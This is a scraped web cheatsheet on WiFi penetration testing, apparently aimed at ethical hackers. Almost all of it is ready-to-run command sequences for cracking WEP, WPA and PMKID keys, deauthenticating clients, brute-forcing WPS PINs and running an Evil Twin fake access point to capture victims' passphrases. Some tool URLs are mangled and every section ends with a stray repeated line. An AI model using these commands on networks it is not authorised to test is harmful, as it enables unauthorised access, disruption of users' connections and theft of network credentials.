Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks
WiFi penetration testing is a critical component of network security, aiming to identify vulnerabilities in wireless networks and implement appropriate security measures.
Our WiFi penetration testing cheatsheet covers various techniques and methodologies targeting WEP, WPA, WPA2, and WPA3 encryption standards.
Here are some popular automated tools for WiFi penetration testing that will be invaluable for your WiFi penetration testing cheatsheet:
- Aircrack-ng Suite: https://www.aircrack-ng.org/
- Wireshark: https://www.wireshark.org/
- Reaver: https://github.com/t6x/reaver-wps-fork-t6x
- Wifite: https://github.com/derv82/wifite2
- Fluxion: https://github.com/FluxionNetwork/fluxion
- Fern WiFi Cracker: https://github.com/savio-code/fern-wifi-cracker
Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks
-
WEP Penetration Testing
- Enable monitor mode:
airmon-ng start wlan0
- Capture packets:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Crack the WEP key:
aircrack-ng [OUTPUT.cap]
- Enable monitor mode:
-
WPA Penetration Testing
- Enable monitor mode:
airmon-ng start wlan0
- Capture WPA handshake:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Deauthenticate client:
aireplay-ng --deauth 5 -a [BSSID] -c [CLIENT] wlan0mon
- Crack WPA key:
aircrack-ng [OUTPUT.cap] -w [WORDLIST]
- Enable monitor mode:
-
PMKID Attack
- Enable monitor mode:
airmon-ng start wlan0
- Capture PMKID:
hcxdumptool -i wlan0mon --enable_status 3 --filterlist=[TARGETS] --filtermode=2 --outfile=[OUTPUT]
- Convert to hashcat format:
hcxpcaptool -z [HASHFILE] [OUTPUT]
- Crack PMKID:
hashcat -m 16800 [HASHFILE] [WORDLIST] --force
- Enable monitor mode:
-
ARP Request Replay Attack
- Enable monitor mode:
airmon-ng start wlan0
- Capture packets:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Perform ARP request replay:
aireplay-ng --arpreplay -b [BSSID] -h [CLIENT] wlan0mon
- Crack the WEP key:
aircrack-ng [OUTPUT.cap]
- Enable monitor mode:
-
WPS PIN Attack
- Enable monitor mode:
airmon-ng start wlan0
- Scan for WPS-enabled networks:
wash -i wlan0mon
- Crack WPS PIN using Reaver:
reaver -i wlan0mon -b [BSSID] -c [CHANNEL] -vv -K 1
- Obtain WPA passphrase from cracked PIN.
- Enable monitor mode:
-
HITRE Attack (Handshake, Interactive, and Timing Resource Exhaustion)
- Enable monitor mode:
airmon-ng start wlan0
- Capture WPA handshake:
airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
- Repeatedly deauthenticate clients:
aireplay-ng --deauth [COUNT] -a [BSSID] wlan0mon
- Crack WPA key:
aircrack-ng [OUTPUT.cap] -w [WORDLIST]
- Enable monitor mode:
-
Evil Twin Attack
- Install Fluxion:
git clone https://github.com/FluxionNetwork/fluxion
- Run Fluxion:
cd fluxion && ./fluxion.sh
- Select language and follow the on-screen instructions.
- Choose “Evil Twin AP” attack and configure the fake access point.
- Capture the WPA passphrase when the victim connects to the fake access point.
- Install Fluxion:
source: https://latesthackingnews.com/2023/04/30/wifi-penetration-testing-cheatsheet-for-ethical-hackers/